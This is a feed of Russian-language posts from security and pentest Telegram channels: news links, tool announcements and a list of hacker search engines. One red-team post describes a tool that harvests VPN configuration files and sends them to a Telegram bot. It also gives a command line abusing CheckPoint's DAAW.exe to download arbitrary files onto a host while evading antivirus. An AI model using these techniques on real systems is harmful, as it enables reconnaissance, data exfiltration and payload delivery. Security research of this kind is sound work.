Fsecurity | HH

Подготовил для вас самый большой на данный момент гайд по тестированию CMS Bitrix. 😈 ➡️Причем, в статье я не только показал все существующие на данный момент известные методы и техники поиска уязвимостей в битриксе, но и поделился своими уникальными наработками. Включая атаки на кастомные модули и анонс собственного сканера под CMS Bitrix. ➡️Также добавил материалы по структуре модулей и матчасть по самому Битриксу. Даже если вы только знакомитесь с этой CMS, после прочтения точно что-нибудь найдете)🥤 Ссылка на статью 💫 @pentestnotes | #pentest #bitrix

🔗Ссылка: https://www.securitylab.ru/news/557769.php

🔗Ссылка: https://habr.com/ru/companies/tomhunter/articles/895272/

🔗Ссылка: https://www.securitylab.ru/news/557827.php

Релиз статьи о автоматическом анализе защищённости Cisco IOS с использованием моей утилиты Nihilist Caster - Nihilistic Genre: Defensive Label: Medium Release Date: 28 March 2025 Performed by: Caster Written by: Magama Bazarov Cover Man: Magama Bazarov (Sony ILCE-7M3, f/2.8, 1/200 sec) https://medium.com/@casterbyte/nihilistic-automated-cisco-ios-security-analysis-733a978d66b0

🔗Ссылка: https://habr.com/ru/companies/timeweb/articles/861510/

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://securelist.com/operation-forumtroll/115989/

🎃 Awesome Hacker Search Engines Большая подборка поисковиков, которые будут полезны ИТ специалистам, поиск по различным устройствам, эксплоитам, уязвимостям, исходным кодам и т.д. ➡️ https://awesome-hacker-search-engines.com Постоянно пользуюсь сам: ▪️ Shodan ▪️ security.snyk.io ▪️ Exploit-DB ▪️ Sploitus ▪️ GTFOBins ▪️ LOLBAS ▪️ grep.app ▪️ DNSDumpster ▪️ Crt.sh ▪️ Have I Been Pwned ▪️ ntlm.pw #search #security #servers #exploit ✈️ Pentest HaT

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗 Ссылка: https://www.securitylab.ru/news/557757.php

🔗Ссылка: https://opennet.ru/62964/

Кто любит VPN?! 😆 Последние дни я размышлял об аналитике в Red Team. В ходе операций важно проводить качественную энумерацию — даже мелкие находки могут усилить атаку. Так я задумался о корпоративных VPN 🤔 Доступ к VPN расширяет возможности для пивотинга и эскалации атаки. Я решил исследовать, как злоумышленник или Red Team могут использовать стандартные VPN-клиенты для разведки на хосте и обхода AV 🔫 Нашел пару use кейсов на примере клиента CheckPoint VPN: В лог файле агента`C:\Program Files (x86)\CheckPoint\Endpoint Connect\trac.log` конфигурации подключения trac.config могут быть записаны в нешифрованном виде, что может дать информацию о VPN пирах, пользователе, типе подключения, есть ли 2FA и до каких подсетей может достучаться атакуемый пользователь 🤣 В качестве PoC написал инструмент для поиска конфигов на хосте 😠

Chocopie is a tool designed for reconnaissance on a host system, specifically to check for the presence of VPN configuration files. It scans the system drive (`C:\Users\`) for OpenVPN configuration files (`.ovpn`) and extracts VPN-related configurations from CheckPoint Endpoint Connect logs. The found data is then automatically sent to a Telegram bot.

Второй кейс, есть возможность загрузить любой файлик с интернета при помощи компонента VPN агента на хост. Бинарь который способен скачать файл DAAW.exe (PoC ниже) ❗️ File Drop via Check Point VPN binaries:

C:\Program Files (x86)\CheckPoint\Endpoint Connect\DAAW.exe -url <URL> -fileName <PATH>

Техника спалится в EDR из-за шумных флагов, но все же прикольный способ учитывая что обычный AV на него не ругнется из за чистых сигнатур. P.S Использовать только в целях изучения, автор против неправомерных действий без согласия владельцев систем @s0ld13r_ch

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

AdaptixC2 v0.3 is out https://github.com/Adaptix-Framework/AdaptixC2 New: * Linking Agents (eg SMB) * Sessions Graph * Agent marker * Health checker * And more in the changelog https://adaptix-framework.gitbook.io/adaptix-framework/changelog/v0.2-greater-than-v0.3

Репост/перепост приветствуется😉

🔗Ссылка: https://habr.com/ru/companies/cyberok/articles/893852/

⚙️ iximiuz Labs Практические задания, направленные на развитие ваших навыков в области 🖥 DevOps и/или серверной разработки. Одни задачи имеют более образовательный характер, другие же базируются на реальных сценариях. Платформа предлагает подсказки и обратную связь для каждого задания, включая автоматизированную проверку решений. В разделе с контейнерами 75 задач и 43 для кубика. Задания рассчитаны как на новичков, так и на опытных специалистов. Похоже на Сodewars, но для DevOps Примеры некоторых заданий:

▪️Run a Container in Background, Read Logs, and Attach ▪️Install and Configure containerd on a Linux Host ▪️Build a Production-Ready Node.js Container Image: Nuxt Application ▪️Classic Sysadmin Task: Which Process Is Listening on a Port? ▪️Make a Kubernetes Pod Survive an OOM Event Without Restarting

➡️ https://labs.iximiuz.com/challenges #devops #training #docker #kubernetes ✈️ Pentest HaT

🔗Ссылка: https://www.securitylab.ru/news/557709.php

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Малварь рисёрчеры и реверсеры видимо тоже скоро следом за веберами пойдут на курсы пекарей, электриков и плотников? 🤨 LaurieWired скрестила Ghidra с LLM. Получилось очень хорошо. Ссылка на проект тут.